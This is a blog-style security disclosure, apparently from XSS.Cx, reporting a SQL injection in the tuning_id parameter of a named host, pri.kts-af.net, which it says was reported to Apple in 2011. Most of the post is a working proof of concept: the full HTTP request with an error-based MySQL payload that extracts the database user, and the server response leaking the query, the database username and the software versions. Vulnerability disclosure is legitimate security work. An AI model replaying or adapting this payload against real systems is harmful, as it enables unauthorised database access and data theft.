Reported to Apple Product Security on 9-27-2011
Summary
| Severity: | High |
| Confidence: | Firm |
| Host: | http://pri.kts-af.net |
| Path: | /xml/index.xml |
Issue detail
The tuning_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the tuning_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The database appears to be MySQL.
Subsequent queries showed the Database User to be ADMIN!
XSS.Cx SQLi PoC to Confirm Database USername
Fingerprinted 9-27-2011 by XSS.Cx Anti-Phishing Trawler
Keywords: Blind, Boolean, SQL, Injection, CWE-89, CAPEC-66, MySQL, Database, Admin, Extraction, Apple, pri.kts-af.net
==============================================================================================================================
Complete Application Request | HTTP GET
==============================================================================================================================
GET /xml/index.xml?sid=09A05772824906D82E3679D21CB1158B&tuning_id=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(SELECT%20user())%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: pri.kts-af.net
Accept-Encoding: gzip, deflate
==============================================================================================================================
Complete Application Response | HTTP RESPONSE
==============================================================================================================================
HTTP/1.1 200 OK
Date: Wed, 28 Sep 2011 11:47:17 GMT
Server: Apache/1.3.41 (Darwin) PHP/4.4.9
Cache-Control: no-cache, must-revalidate
Expires: Mon, 02 Feb 1970 18:00:00 GMT
X-Powered-By: PHP/4.4.9
Last-Modified: Wed, 28 Sep 2011 11:47:17 GMT
Cneonction: close
Content-Type: text/xml
Content-Length: 966
</td></tr></table><b>Database error:</b> Invalid SQL: SELECT t.station_id, t.menu_sequence FROM tuning t LEFT JOIN stations s ON t.station_id=s.station_id LEFT JOIN station_urls u ON t.station_id=u.station_id LEFT JOIN stream_types st ON u.stream_type_id=st.stream_type_id LEFT JOIN station_url_clients cu on s.station_id=cu.station_id WHERE parent_tuning_id=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),(SELECT user()),CHAR(95),CHAR(33),CHAR(64)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) AND type='S' AND t.valid='Y' AND s.approved='Y' AND s.type_code != 'W' AND cu.url_no=u.url_no AND cu.client_id=1 AND cu.approved='Y' AND ( u.stream_type_id IN (6,21) AND u.web_play != 'S'
) AND cu.test_status = 'P' GROUP BY s.station_id ORDER BY t.menu_sequence, s.station, s.station_id LIMIT 0,1000<br>
<b>MySQL Error</b>: 1062 (Duplicate entry '_!@kbws5@localhost_!@:1' for key 1)<br>
Session halted.
=============================================================================================================================
CWE-89 Fingerprint in Application Response | HTTP RESPONSE FINGERPRINT
==============================================================================================================================
(Duplicate entry '_!@kbws5@localhost_!@:1' for key 1)
No comments:
Post a Comment